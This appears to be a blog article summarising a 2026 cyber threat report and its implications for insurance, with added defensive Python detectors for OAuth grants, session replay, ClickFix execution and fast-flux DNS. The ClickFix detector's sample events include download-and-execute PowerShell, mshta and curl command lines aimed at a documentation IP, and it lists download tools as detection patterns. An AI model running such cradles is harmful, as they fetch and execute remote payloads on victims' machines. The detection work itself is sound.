The 2026 Threat Landscape: Same tactics, new speed
11th June 2026
Bridewell’s 2026 Cyber Threat Intelligence Report shows a world where attackers are mostly doing the same things, but doing them faster, more quietly, and with far better use of identity, trusted platforms and AI.
The report paints a clear picture: the most important shifts in cyber security are not the noisiest headlines but the quiet optimisation of tactics that already work. Offensive security tooling, information stealers, ransomware affiliates, social engineering and abuse of trusted platforms remain central, but adversaries now use them with greater speed, adaptability and resilience.
For security and risk leaders, the question is no longer “Which new attack should we fear?” but “How quickly can we detect and contain the well-known tactics that are now weaponised at machine speed?”
Identity led compromise at the centre of attacks
Bridewell highlights identity-led compromise as a central theme in modern intrusions, spanning stolen credentials, session tokens, OAuth abuse and compromise of non-human identities such as service accounts and API keys. This mirrors findings from CrowdStrike’s 2026 Global Threat Report, which notes that most adversaries are “logging in, not breaking in,” and that 82% of detections are now malware‑free, leaning heavily on identity and legitimate tools.
In plain language, attackers increasingly win by pretending to be you or your systems, not by dropping obvious malware.
For technical teams, the shift focuses on:
- Stronger authentication and phishing‑resistant MFA for high‑value accounts
- Session management and token protection
- Governance for service accounts, API keys and OAuth grants
For boards, the key question becomes: do we have a clear view of who and what can access our systems, and how quickly could we spot an attacker using valid credentials?
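One concrete piece of the OAuth-grant governance mentioned above is to score every new consent grant before it quietly becomes attacker persistence. The script below is an added example written for this article, not tooling from Bridewell or any identity provider. The event shape, the app names and IDs, and the scope weights are constructed assumptions; the scope names follow the Microsoft Graph style, but the scoring logic is generic and would apply to any provider that logs delegated scopes, publisher verification and who consented.

```python
"""Score OAuth consent grants for ConsentFix-style persistence risk.

Added example for this article, not Bridewell's tooling. The event shape,
app names/IDs and weights are constructed assumptions.
"""
from dataclasses import dataclass

# Weight per delegated scope. offline_access yields a refresh token, which is
# what turns a single consent click into durable attacker persistence.
SCOPE_WEIGHT = {
    "openid": 0, "profile": 0, "email": 0, "User.Read": 0,
    "offline_access": 3,
    "Mail.Read": 2, "Mail.ReadWrite": 3, "Mail.Send": 3,
    "Files.Read.All": 2, "Files.ReadWrite.All": 3,
    "Directory.Read.All": 2,
}
UNKNOWN_SCOPE_WEIGHT = 1  # anything not on the list still counts a little


@dataclass(frozen=True)
class ConsentGrant:
    app_id: str
    app_name: str
    publisher_verified: bool
    consent_type: str          # "admin" or "user"
    scopes: tuple
    first_seen_in_tenant: bool
    consented_by: str


def score_grant(g):
    """Return (score, reasons) for one grant."""
    score, reasons = 0, []
    for s in g.scopes:
        w = SCOPE_WEIGHT.get(s, UNKNOWN_SCOPE_WEIGHT)
        if w:
            score += w
            reasons.append(f"scope {s} (+{w})")
    if not g.publisher_verified:
        score += 3
        reasons.append("unverified publisher (+3)")
    if g.consent_type == "user":
        score += 2
        reasons.append("end-user consent, no admin review (+2)")
    if g.first_seen_in_tenant:
        score += 1
        reasons.append("app never seen in tenant before (+1)")
    return score, reasons


def level_for(score):
    """Illustrative thresholds; tune against your own consent history."""
    if score >= 7:
        return "revoke"
    if score >= 4:
        return "review"
    return "ok"


def triage(grants):
    """Map app_id -> (level, score, reasons), highest risk first."""
    out = {}
    for g in grants:
        score, reasons = score_grant(g)
        out[g.app_id] = (level_for(score), score, reasons)
    return dict(sorted(out.items(), key=lambda kv: -kv[1][1]))


# Constructed sample grants (hypothetical apps, IDs and users).
SAMPLE_GRANTS = [
    ConsentGrant("app-0001", "Contoso Expense Sync", True, "admin",
                 ("User.Read", "Files.Read.All"), False, "admin@corp.example"),
    ConsentGrant("app-0002", "PDF Viewer Pro", False, "user",
                 ("openid", "offline_access", "Mail.ReadWrite", "Files.ReadWrite.All"),
                 True, "alice@corp.example"),
    ConsentGrant("app-0003", "Team Calendar Helper", False, "user",
                 ("openid", "profile", "User.Read", "Calendars.Read"),
                 False, "bob@corp.example"),
]

if __name__ == "__main__":
    for app_id, (level, score, reasons) in triage(SAMPLE_GRANTS).items():
        print(f"{app_id}: {level} (score {score})")
        for r in reasons:
            print("   ", r)
```

The point of the weighting is that the dangerous combination is not any single scope but a refresh token plus mailbox or file access, granted by an end user to an app nobody in the tenant has reviewed. Feeding the "revoke" tier straight into an automated grant-revocation step closes the loop the board question above is really asking about.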
Information stealers as the fuel for downstream crime
Bridewell emphasises that information stealing malware continues to fuel ransomware, initial access brokerage and broader cybercrime. Stolen browser data, cookies, and password vaults provide attackers with ready‑made access paths into organisations and personal accounts.
Similar patterns are reported in threat assessments from NJCCIC and other government bodies, which highlight theft and abuse of login credentials as one of the most persistent threats heading into 2026.
The takeaway is simple: “small” infostealer incidents are rarely small. They are often the first step in a much larger breach or extortion event.
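A stolen browser cookie is only useful to the attacker if it keeps working from their machine, so one of the cheapest detections for infostealer fallout is a session token that suddenly appears from a different network. The script below is an added example, not something from the report; the log lines are constructed (documentation IP ranges and private-use ASNs) and the comma-separated field layout is an assumption rather than any vendor's real format.

```python
"""Flag a session token replayed from a different network.

Added example, not from Bridewell's report. Log lines are constructed and
the field layout (ts,user,session_id,src_ip,asn,user_agent) is an assumption.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)

# Constructed sample: same session cookie seen from two networks.
SAMPLE_LOG = """\
2026-06-11T09:00:00Z,alice,sess-a1,198.51.100.10,AS64496,Chrome/125 Windows
2026-06-11T09:05:00Z,alice,sess-a1,198.51.100.10,AS64496,Chrome/125 Windows
2026-06-11T09:12:00Z,alice,sess-a1,203.0.113.44,AS64500,Chrome/125 Windows
2026-06-11T10:00:00Z,bob,sess-b7,192.0.2.8,AS64497,Firefox/126 macOS
2026-06-11T11:30:00Z,bob,sess-b7,203.0.113.9,AS64501,Firefox/126 macOS
2026-06-11T12:00:00Z,carol,sess-c3,198.51.100.77,AS64496,Chrome/125 Windows
2026-06-11T12:03:00Z,carol,sess-c3,203.0.113.200,AS64502,python-requests/2.32
"""


def parse(log_text):
    """Parse the constructed CSV layout into a list of event dicts."""
    events = []
    for line in log_text.strip().splitlines():
        ts, user, sid, ip, asn, ua = line.split(",", 5)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user, "sid": sid, "ip": ip, "asn": asn, "ua": ua,
        })
    return events


def detect_replay(events, window=WINDOW):
    """Return alerts for session IDs seen from two ASNs within `window`.

    Severity is "high" when the user agent also changes: a cookie lifted by
    an infostealer is normally replayed from the attacker's own tooling,
    not from the victim's browser profile. Same UA from a new ASN is weaker
    (could be a laptop moving to mobile data) and is rated "medium".
    """
    by_sid = defaultdict(list)
    for e in events:
        by_sid[e["sid"]].append(e)

    alerts = []
    for sid, evs in by_sid.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            if cur["asn"] == prev["asn"]:
                continue
            if cur["ts"] - prev["ts"] > window:
                continue
            sev = "high" if cur["ua"] != prev["ua"] else "medium"
            alerts.append({
                "session_id": sid,
                "user": cur["user"],
                "severity": sev,
                "from": f'{prev["ip"]} ({prev["asn"]})',
                "to": f'{cur["ip"]} ({cur["asn"]})',
                "gap_minutes": int((cur["ts"] - prev["ts"]).total_seconds() // 60),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_replay(parse(SAMPLE_LOG)):
        print(a)
```

The natural response action for a "high" hit is to revoke that session server-side and force re-authentication, which is exactly the "how quickly can we revoke exposed tokens" question the insurance section below puts to insureds. Bob's session is deliberately left unflagged: a 90-minute gap between networks with an unchanged browser is the sort of thing a travelling user produces every day.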
Ransomware fragmentation and data-theft-first extortion
Bridewell notes that ransomware is fragmenting, with data theft increasingly rivalling or even replacing encryption as the main extortion lever. This is consistent with multiple 2026 threat reports that observe declining ransom payments but sustained, or even rising, data theft and extortion attempts.
Not every “ransomware” incident will involve full-scale encryption. Attackers may exfiltrate data quietly, then threaten publication, regulatory notification, or attack your customers and partners. This means impact is less about “can we restore from backup?” and more about “what was taken, who is affected, and how will regulators, customers and markets react?”
Social engineering: ClickFix, ConsentFix and beyond
The report highlights evolving social engineering, including techniques such as ClickFix, FileFix and ConsentFix. These lures often encourage users to “fix” a problem by running scripts, accepting permissions, or granting OAuth consent that silently establishes attacker persistence.
This aligns with other research (e.g., Red Canary’s 2026 Threat Detection Report) showing increased use of “trusted” workflows (browser prompts, cloud consent screens, IT‑style support messages) to bypass traditional filters.
Attackers are getting better at looking like routine IT or cloud admin flows, not just sending obvious phishing emails.
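ClickFix and FileFix lures leave a recognisable trace on the endpoint: an interactive parent (Explorer, via the Run dialog or File Explorer address bar, or a browser) spawns a script host whose command line is a download-and-execute cradle. The detector below is an added example written for this article, not code from the report or from Red Canary. The events are constructed, the field names are a simplified assumption rather than any EDR's real schema, and the URLs use documentation address space.

```python
"""Detect ClickFix / FileFix-style execution from process-creation events.

Added example, not from the report. Events are constructed and the field
names (parent_image, image, command_line, user) are an assumed simplified
schema, not any vendor's.
"""
import re

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (label, regex). Any one of these on an interactive-parent -> script-host
# edge is worth a look; several together is a classic paste-and-run cradle.
CRADLE_INDICATORS = [
    ("invoke-expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("web-fetch", re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|bitsadmin|certutil)\b", re.I)),
    ("hidden-window", re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return matched indicator labels, or [] if the event is not ClickFix-like."""
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    cmd = event["command_line"]
    return [label for label, rx in CRADLE_INDICATORS if rx.search(cmd)]


def scan(events):
    """Return (index, user, indicators) for every event tripping >= 1 indicator."""
    hits = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            hits.append((i, ev["user"], labels))
    return hits


# Constructed sample events (hypothetical users and URLs).
SAMPLE_EVENTS = [
    {"user": "alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -w hidden -c "iex (iwr http://203.0.113.7/v.txt -UseBasicParsing)"'},
    {"user": "bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta https://203.0.113.7/check.hta"},
    {"user": "alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell"},                     # user just opened a shell
    {"user": "SYSTEM", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"user": "dave", "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c curl -s http://203.0.113.7/a.exe -o %TEMP%\a.exe && start %TEMP%\a.exe"},
]

if __name__ == "__main__":
    for idx, user, labels in scan(SAMPLE_EVENTS):
        print(f"event {idx} user={user}: {', '.join(labels)}")
```

The parent-process check is what keeps this usable: scheduled scripts launched by service processes (event 3) never reach the indicator stage, and a user simply opening PowerShell (event 2) produces no indicators. In production you would add the terminal hosts and browsers your fleet actually uses to the parent set and treat "url" on its own as a low-confidence hit.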
Abuse of trusted platforms and cloud services
Bridewell underscores that trusted platforms, cloud services and first‑party applications are now part of the attack chain, not just targets. Attackers host infrastructure on reputable providers, hide command‑and‑control behind legitimate services, and leverage built‑in automation and integrations to move laterally.
CrowdStrike and Google Cloud’s 2026 Cybersecurity Forecast similarly highlight increased exploitation of cloud environments, edge devices and virtualisation infrastructure, with threat actors exploiting visibility gaps between identity, cloud and endpoint layers.
The tools you rely on to run your business (SaaS platforms, cloud services, collaboration tools) can be, and are being, used against you if controls and monitoring are weak.
AI as an amplifier, not a magic new threat
The report stresses that AI is amplifying attacker capability by accelerating reconnaissance, exploit development, social engineering and scale. This echoes the 2026 Verizon DBIR and CrowdStrike reports, which document AI‑enabled adversaries increasing attack speed, efficiency and the volume of campaigns.
Key nuances:
- AI primarily makes existing tactics faster and more scalable.
- It also introduces new exposure where organisations adopt AI tools without proper governance (“Shadow AI”), a growing issue in its own right.
Infrastructure agility and resilience
Bridewell emphasises that adversary infrastructure (hosting, C2 frameworks, rotation patterns) is evolving to be more agile, making it harder to track and take down. This supports the broader trend of attackers using commodity infrastructure, fast‑flux techniques (constantly changing the IP addresses behind malicious domains, typically with very short DNS TTLs) and layered services to stay ahead of static blocklists and slow‑moving defenders.
This underscores the need for:
- Threat intelligence that tracks infrastructure patterns over time.
- Detection that focuses on behaviour and anomalies, not just static indicators.
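Fast-flux is a good illustration of why behaviour beats static indicators: no single IP is worth blocking, but the pattern of resolution is. The script below profiles passive DNS records per domain and flags the fast-flux signature (many distinct IPs, spread across many networks, with short TTLs and rapid rotation). It is an added example, not Bridewell's tooling; the records are constructed from documentation and benchmark IP ranges, the /16 prefix is a stand-in for the ASN lookup you would use with real data, and the thresholds are illustrative starting points rather than calibrated values.

```python
"""Spot fast-flux behaviour in passive DNS data.

Added example for this article, not Bridewell's tooling. Records are
constructed (documentation/benchmark IP space); the /16 network key is an
assumption standing in for an ASN lookup; thresholds are illustrative.
"""
import ipaddress
from collections import defaultdict

# (observed_at, domain, resolved_ip, ttl_seconds), constructed.
SAMPLE_RECORDS = [
    ("2026-06-11T08:00", "cdn-login.example", "192.0.2.10", 60),
    ("2026-06-11T08:05", "cdn-login.example", "198.51.100.20", 60),
    ("2026-06-11T08:10", "cdn-login.example", "203.0.113.30", 60),
    ("2026-06-11T08:15", "cdn-login.example", "198.18.7.7", 60),
    ("2026-06-11T08:20", "cdn-login.example", "198.19.3.3", 60),
    ("2026-06-11T08:25", "cdn-login.example", "192.0.2.11", 60),
    ("2026-06-11T08:30", "cdn-login.example", "198.51.100.21", 60),
    ("2026-06-11T08:35", "cdn-login.example", "203.0.113.31", 60),
    # Ordinary site: stable address, long TTL.
    ("2026-06-11T08:00", "www.example.com", "192.0.2.1", 3600),
    ("2026-06-11T09:00", "www.example.com", "192.0.2.1", 3600),
    ("2026-06-11T10:00", "www.example.com", "192.0.2.2", 3600),
    ("2026-06-11T11:00", "www.example.com", "192.0.2.1", 3600),
    # CDN-like: short TTL and rotation, but all inside one network.
    ("2026-06-11T08:00", "static.example.org", "203.0.113.1", 60),
    ("2026-06-11T08:05", "static.example.org", "203.0.113.2", 60),
    ("2026-06-11T08:10", "static.example.org", "203.0.113.3", 60),
    ("2026-06-11T08:15", "static.example.org", "203.0.113.4", 60),
    ("2026-06-11T08:20", "static.example.org", "203.0.113.5", 60),
    ("2026-06-11T08:25", "static.example.org", "203.0.113.6", 60),
    ("2026-06-11T08:30", "static.example.org", "203.0.113.1", 60),
    ("2026-06-11T08:35", "static.example.org", "203.0.113.2", 60),
]


def network_of(ip, prefix=16):
    """Coarse network key; replace with an ASN lookup when you have one."""
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def profile_domains(records):
    """Per-domain resolution profile: distinct IPs/networks, min TTL, churn."""
    acc = defaultdict(lambda: {"lookups": 0, "ips": set(), "nets": set(),
                               "min_ttl": None, "changes": 0, "last_ip": None})
    for _ts, domain, ip, ttl in sorted(records):   # chronological per domain
        d = acc[domain]
        d["lookups"] += 1
        d["ips"].add(ip)
        d["nets"].add(network_of(ip))
        d["min_ttl"] = ttl if d["min_ttl"] is None else min(d["min_ttl"], ttl)
        if d["last_ip"] is not None and ip != d["last_ip"]:
            d["changes"] += 1
        d["last_ip"] = ip

    out = {}
    for domain, d in acc.items():
        # churn = share of consecutive lookups whose answer changed
        churn = d["changes"] / (d["lookups"] - 1) if d["lookups"] > 1 else 0.0
        out[domain] = {
            "distinct_ips": len(d["ips"]),
            "distinct_nets": len(d["nets"]),
            "min_ttl": d["min_ttl"],
            "churn": round(churn, 2),
        }
    return out


def is_fast_flux(p, min_ips=5, min_nets=3, max_ttl=300, min_churn=0.5):
    """All four signals together; any one alone is noisy (CDNs, round robin)."""
    return (p["distinct_ips"] >= min_ips and p["distinct_nets"] >= min_nets
            and p["min_ttl"] <= max_ttl and p["churn"] >= min_churn)


def classify(records):
    """Return {domain: profile + fast_flux flag}."""
    return {dom: dict(p, fast_flux=is_fast_flux(p))
            for dom, p in profile_domains(records).items()}


if __name__ == "__main__":
    for dom, p in classify(SAMPLE_RECORDS).items():
        print(dom, p)
```

The CDN-like domain is included on purpose: it has the short TTL and the rotation, and would be a false positive for any rule that keyed on those alone. Requiring address diversity across networks is what separates a botnet of compromised hosts in many providers from a legitimate load-balanced service, and it is why the intelligence product you want tracks infrastructure patterns over time rather than a snapshot of addresses.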
These findings, combined with other 2026 threat and insurance market reports, have direct implications for how cyber insurance views and prices risk.
Identity, not just perimeter, as a core risk dimension
Given the prominence of identity‑led compromise, the cyber insurance market should treat identity security as a primary rating factor, not a secondary control.
Key underwriting questions and metrics:
- Use of phishing‑resistant MFA (e.g., FIDO2, WebAuthn) for admins and remote access.
- Coverage and governance of service accounts and machine identities.
- Controls around SSO, OAuth consent governance and session management.
Treat infostealers and “small” compromises as leading indicators
With information stealers feeding initial access and ransomware, underwriters should probe how insureds detect and respond to infostealer infections.
- How quickly can the organisation identify and revoke credentials and tokens exposed by infostealers?
- Is there a playbook‑driven response when infostealer logs containing corporate credentials appear in criminal markets?
Ransomware: price for resilience, not ransom
Given the fragmentation of ransomware and the rise of data‑theft‑first extortion, insurance should place more emphasis on resilience than on the expectation of ransom payment.
- Backup and recovery maturity (segmentation, offline copies, test frequency, realistic RTO/RPO).
- Data classification and minimisation (limiting the blast radius of data theft).
- Crisis communications, regulatory response and business continuity capabilities.
Social engineering and business process controls
With techniques like ClickFix and ConsentFix, the line between “technical” and “business process” risk is blurring.
- Strength of out‑of‑band verification for high‑risk actions (payment changes, access elevation, vendor onboarding).
- Breadth and realism of awareness training (beyond email phishing to cover mobile, chat, and cloud consent prompts).
- Use of just‑in‑time prompts or transaction‑level controls for sensitive actions.
This aligns with broader findings that human factors continue to dominate breach statistics, but now across more channels.
Cloud, trusted platforms and supply chain as standard exposure, not exceptions
As trusted platforms and cloud services become active components of attack chains, cyber insurance needs to embed supply‑chain and SaaS risk more explicitly in models.
- Inventory and criticality of SaaS and cloud services, including AI platforms.
- Vendor due diligence and continuous monitoring for key providers.
- Segmentation and access controls for integrations (APIs, connectors, automation tools).
This is consistent with 2026 sectoral and threat reports noting cloud environments as the most common entry point and regulation as a key driver of improved security, particularly in critical infrastructure and high‑regulation sectors.
Metrics that matter for pricing and capacity
The 2026 message across Bridewell, Verizon, CrowdStrike and the other corroborating studies is consistent: the fundamentals still matter most, but they must be executed faster and across a broader, more identity‑ and cloud‑centric ecosystem. The metrics that reflect that reality include:
- Mean/median time to remediate critical and known exploited vulnerabilities.
- Adoption of phishing‑resistant MFA on critical paths.
- Proportion of identities and endpoints covered by EDR/XDR with 24/7 monitoring.
- Proportion of workforce using sanctioned, governed AI tools vs unsanctioned ones.
- Frequency and scope of scenario‑based exercises (ransomware, SaaS compromise, cloud account takeover).
These metrics better reflect how an organisation will fare against the fast‑moving, identity‑led, AI‑enabled threats described in Bridewell’s report.
Three practical questions a board can ask:
- How quickly can we detect and contain identity misuse, whether by a human attacker or a malicious tool, across our key systems?
- Which of our business‑critical processes (payments, access changes, data publishing) rely on a single, easily spoofed channel, and how are we hardening them?
- Where are we still operating on monthly or quarterly cycles (patching, vendor reviews, control assurance) in a world where attackers iterate daily?
See the full report here: Cyber Threat Intelligence Report 2026 | Bridewell
